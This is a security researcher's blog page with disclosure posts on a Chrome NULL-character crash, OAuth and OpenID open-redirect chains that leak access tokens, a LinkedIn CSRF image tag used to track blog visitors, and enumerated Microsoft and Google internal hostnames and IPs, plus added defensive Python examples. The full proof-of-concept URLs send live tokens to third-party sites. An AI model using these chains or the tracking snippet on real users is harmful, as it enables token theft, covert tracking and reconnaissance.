<div><b>Andris Atteka's Blog</b></div>
<div><b>A simple string to crash Google Chrome</b> (2015-09-18)</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Recently I reported a crash bug in Google Chrome (issue #533361). This issue reminded me of the </span><a href="http://www.theguardian.com/technology/2015/jun/03/skype-bug-breaks-app" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">recent Skype vulnerability</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> - both are triggered by simple URL strings. So how can you crash Google Chrome? By adding a NULL char to the URL string:</span></div>
<br />
<div style="text-align: center;">
<blockquote class="tr_bq">
<div>
<a href="http://biome3d.com/" target="_blank"><b id="docs-internal-guid-9b073a10-e273-66ad-4461-c97da7d485fc" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">http://biome3d.com/</span></b></a></div>
</blockquote>
</div>
<br />
<div style="text-align: justify;">
<span id="docs-internal-guid-9b073a10-e26b-a9be-37fd-5d02eb924355"><span style="font-family: Arial; font-size: 14.6666666666667px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: 14.6666666666667px;">Unfortunately no reward was awarded, as this was deemed to be only a DoS vulnerability. Anyway, making secure software is much harder than finding issues in it. Thanks Google.</span></span></span></div>
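<div style="text-align: justify;">As an added example (not code from this post or from the Chromium project), here is the input check a web application would want in front of any URL it stores, renders as a link or hands to another component: it rejects URLs that carry a NUL or any other control character, whether literal or hidden behind one or more layers of percent-encoding. The function names are this example's own.</div>

```python
from urllib.parse import unquote, urlsplit

# C0 control characters plus DEL; none of them is legal anywhere in a URL (RFC 3986),
# so their presence means either corruption or deliberate smuggling.
CONTROL_CHARS = frozenset(chr(c) for c in range(0x20)) | {"\x7f"}


def fully_decode(url: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so that "%00"
    and a double-encoded "%2500" both surface as a literal NUL byte."""
    for _ in range(max_rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url


def find_control_chars(url: str) -> list:
    """Code points (as 'U+XXXX') of control characters hidden in the URL; [] when clean."""
    return sorted({f"U+{ord(ch):04X}" for ch in fully_decode(url) if ch in CONTROL_CHARS})


def is_acceptable_url(url: str) -> bool:
    """Accept only absolute http(s) URLs with a host and no embedded control characters.
    The scheme/host check runs on the raw string; the control-character check on the
    decoded one, since on the wire a NUL can only travel as "%00"."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    return not find_control_chars(url)


if __name__ == "__main__":
    # Constructed inputs: the post's URL, and the same URL with a NUL appended three ways.
    for candidate in ("http://biome3d.com/", "http://biome3d.com/\x00",
                      "http://biome3d.com/%00", "http://biome3d.com/%2500"):
        print(repr(candidate), is_acceptable_url(candidate), find_control_chars(candidate))
```

<div style="text-align: justify;">The decode loop is bounded on purpose: an attacker-controlled string can be nested arbitrarily, and three rounds already cover the double-encoding that proxies and templating layers commonly introduce.</div>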
<div><b>Google, Microsoft and token leaks</b> (2015-04-15)</div>
Some stir was recently caused by the <a href="http://intothesymmetry.blogspot.ch/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html" target="_blank">OAuth open redirector</a>, and even an <a href="https://tools.ietf.org/id/draft-bradley-oauth-open-redirector-01.txt" target="_blank">RFC security addendum</a> was created for it. While this has been <a href="http://www.oauthsecurity.com/" target="_blank">known for quite some time already</a>, it's still good to remind the general public. So here's another known issue - an Open Redirector in OpenID.<br />
It works like this - whenever the <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">"checkid_immediate" </span>mode is used, the provider redirects straight back to the supplied return URL without asking the user any questions. And here's an example on <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">accounts.google.com</span>:<br />
<blockquote class="tr_bq">
<a href="https://accounts.google.com/o/openid2/auth?openid.claimed_id=http://specs.openid.net/auth/2.0/identifier_select&openid.ext0.mode=fetch_request&openid.ext0.required=email&openid.ext0.type.email=http://axschema.org/contact/email&openid.identity=http://specs.openid.net/auth/2.0/identifier_select&openid.mode=checkid_immediate&openid.ns=http://specs.openid.net/auth/2.0&openid.ns.ext0=http://openid.net/srv/ax/1.0&openid.ns.ui=http://specs.openid.net/extensions/ui/1.0&openid.realm=http://www.simcracy.com/&openid.return_to=http://www.simcracy.com/a#a">https://accounts.google.com/o/openid2/auth?openid.claimed_id=http://specs.openid.net/auth/2.0/identifier_select&openid.ext0.mode=fetch_request&openid.ext0.required=email&openid.ext0.type.email=http://axschema.org/contact/email&openid.identity=http://specs.openid.net/auth/2.0/identifier_select&openid.mode=checkid_immediate&openid.ns=http://specs.openid.net/auth/2.0&openid.ns.ext0=http://openid.net/srv/ax/1.0&openid.ns.ui=http://specs.openid.net/extensions/ui/1.0&openid.realm=http://www.simcracy.com/&openid.return_to=http://www.simcracy.com/a#a</a></blockquote>
<div style="text-align: justify;">
For a full exploit, let's use an OAuth app (created by Google) that imports some data from Microsoft: </div>
<blockquote class="tr_bq">
<a href="https://login.live.com/oauth20_authorize.srf?response_type=token&client_id=00000000401058A9&scope=wl.emails&redirect_uri=https://accounts.google.com" target="_blank">https://login.live.com/oauth20_authorize.srf?response_type=token&client_id=00000000401058A9&scope=wl.emails&redirect_uri=https://accounts.google.com</a></blockquote>
And here's the full Proof of Concept:<br />
<blockquote class="tr_bq">
<a href="https://login.live.com/oauth20_authorize.srf?response_type=token&client_id=00000000401058A9&scope=wl.emails&redirect_uri=https://accounts.google.com/o/openid2/auth%3Fopenid.claimed_id%3Dhttp://specs.openid.net/auth/2.0/identifier_select%26openid.ext0.mode%3Dfetch_request%26openid.ext0.required%3Demail%26openid.ext0.type.email%3Dhttp://axschema.org/contact/email%26openid.identity%3Dhttp://specs.openid.net/auth/2.0/identifier_select%26openid.mode%3Dcheckid_immediate%26openid.ns%3Dhttp://specs.openid.net/auth/2.0%26openid.ns.ext0%3Dhttp://openid.net/srv/ax/1.0%26openid.ns.ui%3Dhttp://specs.openid.net/extensions/ui/1.0%26openid.realm%3Dhttps://www.courlandconsulting.com/%26openid.return_to%3Dhttps://www.courlandconsulting.com/a%23a" target="_blank">https://login.live.com/oauth20_authorize.srf?response_type=token&client_id=00000000401058A9&scope=wl.emails&redirect_uri=https://accounts.google.com/o/openid2/auth%3Fopenid.claimed_id%3Dhttp://specs.openid.net/auth/2.0/identifier_select%26openid.ext0.mode%3Dfetch_request%26openid.ext0.required%3Demail%26openid.ext0.type.email%3Dhttp://axschema.org/contact/email%26openid.identity%3Dhttp://specs.openid.net/auth/2.0/identifier_select%26openid.mode%3Dcheckid_immediate%26openid.ns%3Dhttp://specs.openid.net/auth/2.0%26openid.ns.ext0%3Dhttp://openid.net/srv/ax/1.0%26openid.ns.ui%3Dhttp://specs.openid.net/extensions/ui/1.0%26openid.realm%3Dhttps://www.courlandconsulting.com/%26openid.return_to%3Dhttps://www.courlandconsulting.com/a%23a</a></blockquote>
<div>
<div style="text-align: justify;">
If you now inspect the URL, you'll notice that the token was sent to my third-party site.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
And here is where the real problem with Authentication Providers comes in - is this a Relying Party (Google) or an Authentication Provider (Microsoft) problem? Whatever the answer, users are the ones suffering.</div>
</div>
<div><b>Creepy visitor tracking using LinkedIn</b> (2014-10-12)</div>
A few days ago I performed an experiment and added the following code to my blog:<br />
<blockquote class="tr_bq" style="text-align: center;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">&lt;img src="https://www.linkedin.com/profile/view?authToken=zRgB&authType=name&id=98261032" /&gt;</span></blockquote>
<div style="text-align: justify;">
The link in the code snippet points to my LinkedIn profile, and those familiar with web security will recognize the CSRF here (the token apparently isn't validated correctly).</div>
<div style="text-align: justify;">
So how did the experiment unfold? Anyone who visited my blog also involuntarily visited my LinkedIn profile. It turns out that around 35% of blog visitors were also logged in to their LinkedIn accounts while browsing the Web, and my LinkedIn profile received more than 800 "profile views" with details about these visitors:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkt3t1Vvps21yJHIXd1Y2qYwBuyFKoVzN_P_kD6huW0UTNCIXjHfFPju9_23RGdOjd-CrotvlMRD4XdTHrEwI8pigo8T0DROpDo9jx4PDoeRUndivZ5Ir7JvD2oAL0VZbf6oSK89oi-iQ/s1600/Screenshot+from+2014-10-11+20:17:04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkt3t1Vvps21yJHIXd1Y2qYwBuyFKoVzN_P_kD6huW0UTNCIXjHfFPju9_23RGdOjd-CrotvlMRD4XdTHrEwI8pigo8T0DROpDo9jx4PDoeRUndivZ5Ir7JvD2oAL0VZbf6oSK89oi-iQ/s1600/Screenshot+from+2014-10-11+20:17:04.png" height="182" width="400" /></a></div>
<br />
<div style="text-align: justify;">
So a little advice - if you prefer privacy, don't forget to sign out of your LinkedIn account before browsing the Web.</div>
<div><b>Microsoft's internal subdomains</b> (2014-10-07)</div>
<div style="text-align: justify;">
The Outlook.com webmail service has a nice feature - it highlights potentially incorrect e-mail addresses in the "To" field. But what happens if we try some obscure subdomains? Well, it looks like the auto-correct feature works just as well for Microsoft's internal subdomains:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnZDAKOFvMIwsyGlOpAxx_SnzuqtiL7R7FA_GAb8E-5seUfvERVR7YbuvQsindqPqPIXyP8ooCHYhWlT_j5iKKwIpe_Nd3lvN3cJKLpcqNhpx98h5jmF3OkHLSYVU_5utE0hREHnDMg_s/s1600/Screenshot+from+2014-10-07+16:28:15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnZDAKOFvMIwsyGlOpAxx_SnzuqtiL7R7FA_GAb8E-5seUfvERVR7YbuvQsindqPqPIXyP8ooCHYhWlT_j5iKKwIpe_Nd3lvN3cJKLpcqNhpx98h5jmF3OkHLSYVU_5utE0hREHnDMg_s/s1600/Screenshot+from+2014-10-07+16:28:15.png" height="124" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
As you can see, both <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">citrix.corp.microsoft.com</span> and <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aol.corp.microsoft.com</span> are recognized as valid e-mail domains, while <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">blabla.corp.microsoft.com</span> is considered an invalid one. Here are some of the subdomains that the auto-corrector recognizes as valid:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">google.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rally.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">citrix.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">vmware.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aol.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cirrus.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cisco.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bluephoenix.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">twitter.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">qualys.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">blizzard.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">alliance.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">amber.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">api.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">apple.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">arm.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ascent.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">asml.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aspen.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">axt.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">blackbox.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cabot.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">caci.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cai.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">carbonite.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cavium.corp.microsoft.com</span></div>
<div><b>How Microsoft is giving your data to Facebook… and everyone else</b> (2014-09-16)</div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<br />
<div style="text-align: justify;">
<span style="line-height: 17.25px; white-space: pre-wrap;"><span style="font-family: Arial; font-size: 15px;">A lot has been written about the dangers of mistakes in OAuth implementations. Here’s another story.
Microsoft uses a specialized OAuth scope </span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">wli.contacts_emails</span><span style="font-family: Arial; font-size: 15px;"> which is available only to Facebook’s app. The interesting part is that users are never notified that the app is trying to access their data; permission is granted silently.
You can try this here (you’ll have to log in):
</span></span><br />
<blockquote class="tr_bq">
<span style="line-height: 17.25px; white-space: pre-wrap;"><a href="https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&redirect_uri=https%3A%2F%2Fwww.facebook.com%2F" target="_blank"><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&redirect_uri=https%3A%2F%2Fwww.facebook.com%2F</span></a></span></blockquote>
<span style="font-family: Arial;"><span style="font-size: 15px; line-height: 17.25px; white-space: pre-wrap;">As you can see, the OAuth token was just sent to Facebook.
Silently granting permission to Facebook is probably not the worst thing (we do trust Facebook, right?). So let’s continue…</span></span></div>
<div style="text-align: justify;">
<span style="line-height: 17.25px; white-space: pre-wrap;"><span style="font-family: Arial; font-size: 15px;">
If you try to modify the “</span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">redirect_uri</span><span style="font-family: Arial; font-size: 15px;">” parameter, you’ll notice that the token is issued to any URL within the </span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">facebook.com</span><span style="font-family: Arial; font-size: 15px;"> domain. So to leak the OAuth token to a malicious third party, an Open Redirect in the </span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">facebook.com</span><span style="font-family: Arial; font-size: 15px;"> domain would be required. As Open Redirects are usually considered low-severity vulnerabilities, it's not particularly hard to find one. For this example we will use an Open Redirect in Facebook’s authorization flow (triggered by providing an invalid ‘</span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">scope</span><span style="font-family: Arial; font-size: 15px;">’ parameter). It works like this:
</span></span><br />
<blockquote class="tr_bq">
<span style="color: #0000ee; font-family: Courier New, Courier, monospace; font-size: x-small;"><span style="line-height: 17.25px; white-space: pre-wrap;"><u><a href="https://www.facebook.com/dialog/oauth?type=web_server&scope=invalid&display=popup&client_id=260755904036570&redirect_uri=http://simcracy.com" target="_blank">https://www.facebook.com/dialog/oauth?type=web_server&scope=invalid&display=popup&client_id=260755904036570&redirect_uri=http://simcracy.com</a></u></span></span></blockquote>
<span style="line-height: 17.25px; white-space: pre-wrap;"><span style="font-family: Arial; font-size: 15px;">So by chaining the two bugs, we are able to acquire OAuth tokens of </span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">live.com</span><span style="font-family: Arial; font-size: 15px;"> users. The complete example is here:</span></span></div>
<blockquote class="tr_bq" style="text-align: justify;">
<span style="line-height: 17.25px; white-space: pre-wrap;"><a href="https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&redirect_uri=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fh%5B%5D%26u%3Dgraph.facebook.com%252Foauth%252Fauthorize%253Ftype%253Dweb_server%2526scope%253De%2526client_id%253D260755904036570%2526redirect_uri%253Dhttp%253A%252F%252Fsimcracy.com" target="_blank"><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&redirect_uri=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fh%5B%5D%26u%3Dgraph.facebook.com%252Foauth%252Fauthorize%253Ftype%253Dweb_server%2526scope%253De%2526client_id%253D260755904036570%2526redirect_uri%253Dhttp%253A%252F%252Fsimcracy.com</span></a></span></blockquote>
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 15px; line-height: 17.25px; white-space: pre-wrap;">If you now inspect the destination URL, you'll notice that Microsoft's OAuth token was sent to a third-party website without your consent.</span></div>
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 15px; line-height: 17.25px; white-space: pre-wrap;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 15px; line-height: 17.25px; white-space: pre-wrap;">Lessons learned:</span></div>
<div style="text-align: justify;">
<span style="line-height: 17.25px; white-space: pre-wrap;"><span style="font-family: Arial; font-size: 15px;">OAuth implementations should never whitelist entire domains, only a few exact URLs, so that “</span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">redirect_uri</span><span style="font-family: Arial; font-size: 15px;">” can’t be pointed at an Open Redirect. Developers should also be careful about silently granting access to apps (having the user approve an app manually probably will not make the user experience much worse).</span></span></div>
<div style="text-align: justify;"><br /></div>
<div style="text-align: justify;"><span style="font-family: Arial; font-size: 15px; line-height: 17.25px; white-space: pre-wrap;">Timeline:</span></div>
<div style="text-align: justify;"><span style="font-family: Courier New, Courier, monospace; font-size: x-small; line-height: 17.25px; white-space: pre-wrap;">2013/11/19 - OAuth vulnerability reported to Microsoft<br />
2013/11/27 - Open Redirect vulnerability reported to Facebook<br />
2014/09/16 - Public disclosure</span></div>
<div style="text-align: justify;"><br /></div>
<div style="text-align: justify;"><span style="font-family: Arial; font-size: 15px; line-height: 17.25px; white-space: pre-wrap;">Update [2014/09/17]: Microsoft has fixed the OAuth vulnerability</span></div>
</div>
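<div style="text-align: justify;">The lesson above, and the OpenID checkid_immediate redirector in the "Google, Microsoft and token leaks" post earlier on this page, both come down to how an authorization server matches redirect_uri. The example below is added here and is not Microsoft's, Google's or Facebook's code: it contrasts the domain-wide match the post describes with exact matching against registered URIs, using the redirect targets quoted in the two posts as inputs. The client_ids are the ones quoted on the page; the registration table and the function names are assumptions made for the example.</div>

```python
from urllib.parse import urlsplit

# Registered redirect URIs per client_id. The client_ids appear in the posts on this
# page; the registrations themselves are constructed (the real ones are not public).
REGISTERED_REDIRECTS = {
    "0000000044002503": {"https://www.facebook.com/"},
    "00000000401058A9": {"https://accounts.google.com"},
}


def weak_domain_check(redirect_uri: str, allowed_host: str) -> bool:
    """The matching rule the post describes: any http(s) URL whose host is the
    registered domain or a subdomain of it is accepted. Every open redirector on
    that domain thereby becomes a valid place to deliver the token."""
    parts = urlsplit(redirect_uri)
    host = (parts.hostname or "").lower()
    return parts.scheme in ("http", "https") and (
        host == allowed_host or host.endswith("." + allowed_host)
    )


def strict_redirect_check(client_id: str, redirect_uri: str) -> bool:
    """Exact string comparison against the URIs registered for this client, as the
    OAuth 2.0 security guidance recommends: no prefix, suffix or domain matching, so
    neither a redirector path like /l.php nor another provider's /o/openid2/auth
    endpoint can be substituted for the registered URI."""
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, set())


# The two redirect targets quoted in the posts, as the authorization server sees them
# after decoding the outer query string once.
FACEBOOK_REDIRECTOR = (
    "http://www.facebook.com/l.php?h[]&u=graph.facebook.com%2Foauth%2Fauthorize"
    "%3Ftype%3Dweb_server%26scope%3De%26client_id%3D260755904036570"
    "%26redirect_uri%3Dhttp%3A%2F%2Fsimcracy.com"
)
# Shortened form of the page's OpenID URL, keeping only the two parameters that matter.
GOOGLE_OPENID_REDIRECTOR = (
    "https://accounts.google.com/o/openid2/auth?openid.mode=checkid_immediate"
    "&openid.return_to=https://www.courlandconsulting.com/a#a"
)


def compare_checks() -> dict:
    """Run both checks over the page's redirect targets: {case: (weak, strict)}."""
    cases = {
        "facebook_home": ("0000000044002503", "facebook.com", "https://www.facebook.com/"),
        "facebook_l.php": ("0000000044002503", "facebook.com", FACEBOOK_REDIRECTOR),
        "google_openid": ("00000000401058A9", "accounts.google.com", GOOGLE_OPENID_REDIRECTOR),
    }
    return {
        name: (weak_domain_check(uri, host), strict_redirect_check(cid, uri))
        for name, (cid, host, uri) in cases.items()
    }


if __name__ == "__main__":
    for name, (weak, strict) in compare_checks().items():
        print(f"{name:15s} domain match: {weak!s:5}  exact match: {strict}")
```

<div style="text-align: justify;">The domain-wide check passes all three targets, including the two redirectors; the exact-match check passes only the registered landing page. Exact matching also removes the incentive to hunt for low-severity open redirects on the partner's domain, which is the chain both posts rely on.</div>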
<div><b>The threat of login CSRF</b> (2014-01-03)</div>
Login CSRF is an often overlooked web vulnerability. Developers tend to focus on securing user data and assume that users wouldn't voluntarily give up access to their accounts. Yet with login CSRF exactly this happens - the attacker gives the victim full control of his own account (a fake account, of course). Once the victim and attacker are in the same trust domain, various other attacks become possible.<br />
<br />
Consequences can vary:<br />
<br />
<ul>
<li>attacker can monitor victim's actions</li>
<li>attacker can interact with the victim without him realizing that a session swap just occurred</li>
<li>some low severity bugs can become exploitable (e.g. an XSS in a configuration page that is visible only to the account holder)</li>
<li>or just search through the recorded links; maybe you'll find some unexpired password reset links etc. that actually log you into the victim's account</li>
</ul>
<br />
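<div style="text-align: justify;">Both this post and the LinkedIn img-tag experiment earlier on this page are defeated by the same two server-side rules: a GET request never changes state, and every state change, the login form included, must carry a token bound to the session cookie that arrived with it. The handler below is an added example, not code from either post; the App class, its routes and the constructed accounts are this example's own assumptions.</div>

```python
import hashlib
import hmac
import secrets

# Server-side secret; generated here for the example, loaded from config in practice.
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Token bound to one session cookie: HMAC(server_key, session_id). A page on
    another origin can read neither the victim's cookie nor this token, and a token
    issued for the attacker's own session verifies for no other cookie."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, token) -> bool:
    expected = issue_csrf_token(session_id)
    return isinstance(token, str) and hmac.compare_digest(expected, token)


class App:
    """Hypothetical request handler; handle() returns (status, cookie to keep)."""

    def __init__(self):
        self.users = {"alice": "alice-pw", "mallory": "mallory-pw"}  # constructed, plaintext for brevity
        self.sessions = {}       # session cookie -> logged-in user, or None while anonymous
        self.profile_views = []  # (viewer, viewed profile id) records

    def new_session(self) -> str:
        """Anonymous visitors get a cookie too, so the login form can be protected."""
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = None
        return sid

    def handle(self, method: str, path: str, cookie: str, params: dict):
        if cookie not in self.sessions:
            return 401, cookie
        if method == "GET":
            # A cross-site <img src="/profile/view?id=..."> lands here with the victim's
            # cookie, but a read records nothing, so it cannot be used as a tracker.
            return (200 if path in ("/login", "/profile/view") else 404), cookie
        if method != "POST":
            return 405, cookie
        if not verify_csrf_token(cookie, params.get("csrf")):
            return 403, cookie  # token missing, or bound to a different session
        if path == "/login":
            user = params.get("user")
            if self.users.get(user) != params.get("password"):
                return 401, cookie
            # Rotate the session id on login so a pre-login cookie cannot be fixated.
            del self.sessions[cookie]
            fresh = secrets.token_urlsafe(16)
            self.sessions[fresh] = user
            return 200, fresh
        if path == "/profile/view":
            viewer = self.sessions[cookie]
            if viewer is None:
                return 401, cookie
            self.profile_views.append((viewer, params.get("id")))
            return 200, cookie
        return 404, cookie


def demo() -> dict:
    """Three requests arriving with a victim's browser cookie; returns the outcomes."""
    app = App()
    victim = app.new_session()    # anonymous visitor, not logged in yet
    attacker = app.new_session()  # attacker's own session on the same site

    # 1. A third-party page embeds <img src="https://site/profile/view?id=98261032">.
    img_status, _ = app.handle("GET", "/profile/view", victim, {"id": "98261032"})

    # 2. Login CSRF: the attacker's page auto-submits mallory's credentials with a token
    #    fetched from the attacker's session, while the browser sends the victim's cookie.
    forged = {"user": "mallory", "password": "mallory-pw", "csrf": issue_csrf_token(attacker)}
    csrf_status, _ = app.handle("POST", "/login", victim, forged)

    # 3. Genuine login from the site's own form, token issued for the victim's cookie.
    genuine = {"user": "alice", "password": "alice-pw", "csrf": issue_csrf_token(victim)}
    login_status, victim = app.handle("POST", "/login", victim, genuine)

    return {
        "img_status": img_status,
        "views_recorded": len(app.profile_views),
        "login_csrf_status": csrf_status,
        "genuine_login_status": login_status,
        "logged_in_as": app.sessions[victim],
    }


if __name__ == "__main__":
    print(demo())
```

<div style="text-align: justify;">The forged login is rejected with 403 before the credentials are even looked at, and the embedded image request completes without leaving a record. Setting the session cookie with SameSite=Lax adds a second, browser-enforced layer, but the token check is what holds up in browsers that do not honour it.</div>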
To mitigate this issue, don't log users in where that's not required. If it's a password reset link, only reset the password; if it's an e-mail confirmation link, only confirm the e-mail without logging the user in. And make sure your other login forms are CSRF protected.
<div><b>Scanning for Google's Active Directory computer names</b> (2013-11-30)</div>
If you remember ad.corp.google.com from the <a href="http://andrisatteka.blogspot.com/2013/11/scanning-for-googles-internal-corporate_25.html" target="_blank">previous post</a>, maybe you are wondering whether it stands for "Active Directory"? It looks like it does. So here's another list, apparently composed of Active Directory computer names. The list was obtained by sending e-mails to addresses such as<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> test@jfarrell1-w.ad.corp.google.com</span> through Gmail.<br />
<div>
<br />
<table>
<tbody>
<tr><td><b>Hostname</b></td><td><b>IP address</b></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bbudge1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.71.111</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rubin1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.26.217.98</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">jfarrell1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">100.100.63.199</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">dario1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.114.234</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">munjal1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.23.165.169</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bedlam.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.100.6</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">gene1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.79.134</span></td></tr>
